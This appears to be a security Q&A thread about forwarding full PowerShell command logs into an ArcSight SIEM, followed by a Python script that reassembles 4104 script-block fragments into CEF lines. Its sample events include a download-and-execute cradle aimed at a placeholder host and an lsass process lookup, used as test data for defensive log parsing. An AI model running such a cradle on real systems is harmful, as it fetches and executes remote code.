
I have read mixed reviews. Our team within our DoD sector suggests that ingesting the logs directly into the SIEM platform would be best, and I feel that having a third-party tool with signatures look at the event, determine whether it was malicious, and then forward an alert to the ESM for investigation.

The next issue we have is getting these events and sub-events parsed.

I have noticed that McAfee ePolicy Orchestrator sometimes alerts on PowerShell events, but we can't seem to write a custom parser override or find the field that contains the full PowerShell command issued, only partial information on the command.

Any help would be much appreciated!

schroeder
md154199
  • This would appear to be a question for the vendor. – schroeder Feb 11 '19 at 16:07
  • Actually, I'm not sure what you are asking help with. ArcSight? Whether to pre-process events? EPO? Can you take another stab at this question? – schroeder Feb 11 '19 at 16:09
  • Take a look at log collection products on the market that can collect Powershell activity logs, parse these at the data source, then forwarded to Arcsight. Another item is if they can also parse in the CEF (Common Event Format) which is introduced by Arcsight. – NASAhorse Feb 12 '19 at 10:34
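An added example, written here and not taken from the question or from any of the commenters, of what "parse at the data source, then forward as CEF" looks like for PowerShell activity. It assumes Script Block Logging is enabled so the Microsoft-Windows-PowerShell/Operational log emits event 4104; that event carries the script text in ScriptBlockText, and a long block is split across several 4104 events that share a ScriptBlockId and are numbered MessageNumber of MessageTotal, which is one common reason a collector shows only part of a command. The sample events, host name and ScriptBlockIds below are constructed, and the CEF vendor/product/severity values are placeholder choices, not ePO or ArcSight output.

```python
"""Reassemble PowerShell 4104 script-block fragments and emit CEF lines."""
import xml.etree.ElementTree as ET
from collections import defaultdict
from xml.sax.saxutils import escape

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def _evt(num, total, block_id, text, ts):
    """Build one constructed 4104 event in the shape `wevtutil qe /f:xml` exports."""
    return f"""<Event xmlns="{NS['e']}">
  <System><Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID>
    <TimeCreated SystemTime="{ts}"/><Computer>WS01.corp.example</Computer></System>
  <EventData>
    <Data Name="MessageNumber">{num}</Data><Data Name="MessageTotal">{total}</Data>
    <Data Name="ScriptBlockText">{escape(text)}</Data>
    <Data Name="ScriptBlockId">{block_id}</Data><Data Name="Path"></Data>
  </EventData></Event>"""


# Constructed sample: block aaaa-1 arrives in two fragments, bbbb-2 in one,
# and cccc-3 is missing fragments 2 and 3 (hypothetical IDs and host).
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1'); $x=1"
SAMPLE_EVENTS = [
    _evt(1, 2, "aaaa-1", _CRADLE[:40], "2019-02-11T16:00:00.000Z"),
    _evt(2, 2, "aaaa-1", _CRADLE[40:], "2019-02-11T16:00:00.010Z"),
    _evt(1, 1, "bbbb-2", "Get-Process | Where-Object Name -eq lsass", "2019-02-11T16:00:01.000Z"),
    _evt(1, 3, "cccc-3", "Start-Sleep 5;", "2019-02-11T16:00:02.000Z"),
]


def parse_4104(xml_text):
    """Pull the fields needed for reassembly out of one event; None if not a 4104."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    if system.findtext("e:EventID", namespaces=NS) != "4104":
        return None
    data = {d.get("Name"): (d.text or "") for d in root.iterfind("e:EventData/e:Data", NS)}
    return {
        "host": system.findtext("e:Computer", namespaces=NS),
        "time": system.find("e:TimeCreated", NS).get("SystemTime"),
        "num": int(data["MessageNumber"]),
        "total": int(data["MessageTotal"]),
        "id": data["ScriptBlockId"],
        "text": data["ScriptBlockText"],
        "path": data.get("Path", ""),
    }


def reassemble(events):
    """Group fragments by ScriptBlockId and join them in MessageNumber order.

    Returns (complete_blocks, incomplete_ids). A block with missing fragments
    is reported rather than forwarded, so a truncated command is never
    presented downstream as the whole command.
    """
    by_id = defaultdict(list)
    for ev in events:
        by_id[ev["id"]].append(ev)
    complete, incomplete = [], []
    for block_id, frags in by_id.items():
        frags.sort(key=lambda e: e["num"])
        if [f["num"] for f in frags] != list(range(1, frags[0]["total"] + 1)):
            incomplete.append(block_id)
            continue
        first = frags[0]
        complete.append({"host": first["host"], "time": first["time"], "id": block_id,
                         "path": first["path"], "text": "".join(f["text"] for f in frags)})
    return complete, incomplete


def _esc_header(s):
    # CEF header fields: escape backslash and the pipe delimiter.
    return s.replace("\\", "\\\\").replace("|", "\\|")


def _esc_ext(s):
    # CEF extension values: escape backslash, '=', and line breaks.
    return (s.replace("\\", "\\\\").replace("=", "\\=")
             .replace("\r", "\\r").replace("\n", "\\n"))


def to_cef(block):
    """Format one reassembled block as a CEF:0 line (placeholder vendor fields)."""
    header = "|".join(_esc_header(x) for x in
                      ["CEF:0", "Microsoft", "PowerShell", "5.1", "4104",
                       "Script block executed", "5"])
    ext = {"rt": block["time"], "dvchost": block["host"], "fname": block["path"] or "-",
           "cs1Label": "ScriptBlockId", "cs1": block["id"], "msg": block["text"]}
    return header + "|" + " ".join(f"{k}={_esc_ext(v)}" for k, v in ext.items())


def forward(xml_events):
    """Parse, reassemble, and return (cef_lines, incomplete_block_ids)."""
    parsed = [p for p in (parse_4104(x) for x in xml_events) if p]
    complete, incomplete = reassemble(parsed)
    return [to_cef(b) for b in complete], incomplete


if __name__ == "__main__":
    lines, missing = forward(SAMPLE_EVENTS)
    print("\n".join(lines))
    print("incomplete blocks:", missing)
```

The point of doing this at the collector rather than in the SIEM is that the join key (ScriptBlockId plus MessageNumber/MessageTotal) is only present on the raw 4104 events; once each fragment has been turned into its own alert the full command can no longer be recovered from the alert alone.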
